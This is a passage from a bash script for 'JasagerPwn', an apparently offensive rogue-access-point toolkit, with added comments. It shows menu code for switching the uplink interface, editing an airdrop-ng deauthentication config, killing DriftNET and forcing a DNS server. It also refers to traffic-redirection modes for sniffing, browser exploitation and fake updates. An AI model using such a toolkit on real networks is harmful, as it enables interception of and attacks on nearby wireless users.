   # exempts this host's own uplink - confirm against the rules format.
   echo “a/$newIFACEmac|$wifiMAC” » /tmp/deauth.conf

;;

# Wired or other uplink: same steps without the /tmp/deauth.conf entry.
n|N|No|no|2)

 resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

 xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

 xterm -geometry 75x12+464+288 -bg black -fg green -T “[ResolvLoop Kill] v$version” -e “killall $dnsID2”

 echo

 echo -e “\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE”

 read -r -p “[?] Please Enter the New Gateway Interface: “ NEWIFACE  

 IFACE=`echo $NEWIFACE`

   if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

     IPTABLES

   elif [ $sniffing -eq 1 ] || [ $browserpwn -eq 1 ] || [ $fakeupdate -eq 1 ] || [ $javaATK -eq 1 ]; then

     ipTableRedirect

   fi

 echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

 chmod +x /tmp/resolv.sh

 bash /tmp/resolv.sh &

 # PID of the bash that ran /tmp/resolv.sh. That script backgrounds its own
 # loop, so the loop itself runs under a different PID.
 dnsID2=`echo $!`

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

   ;;

   # Opens the airdrop-ng rules file in nano, in the foreground.
   C|c|deauth|DeAuth|config|Config|CONFIG|2)

     xterm -geometry 95x47+577+0 -bg black -fg green -T “[EDITING] Airdrop DeAuth Config” -e “nano /tmp/deauth.conf”

     echo

     echo -e “\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes.”

   ;;

   # Refresh: bring $IFACE up, run dhclient on it, then restart the resolv
   # loop. The window title says DeAuth Kill, but the command is the lease
   # renewal.
   R|r|refresh|Refresh|3)

     xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “ifconfig $IFACE up && dhclient $IFACE”

     sleep 3

     # Not referenced again in the visible part of the listing.
     gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

     resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

     xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

     xterm -geometry 75x12+464+288 -bg black -fg green -T “[ResolvLoop Kill] v$version” -e “killall $dnsID2” &

     #while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &> /dev/null &

     echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

     chmod +x /tmp/resolv.sh

     bash /tmp/resolv.sh &

     dnsID2=`echo $!`

   ;;

   M|m|menu|Menu|4)

     break

   ;;

   *) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

     done

 ;;

 # Menu 7/X: hand over to cleanup, which is defined outside this part of the
 # listing. Presumably it restores the network state and exits - confirm that
 # it also resets ip_forward, the NAT rules and /etc/resolv.conf.
 X|x|exit|Exit|7)

   cleanup

 ;;

 *) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

  esac

done

# Fallback call after the menu loop. No break at the outer loop level is
# visible above and the X arm already calls cleanup, so this line looks
# reachable only if the loop is ended some other way - confirm.
cleanup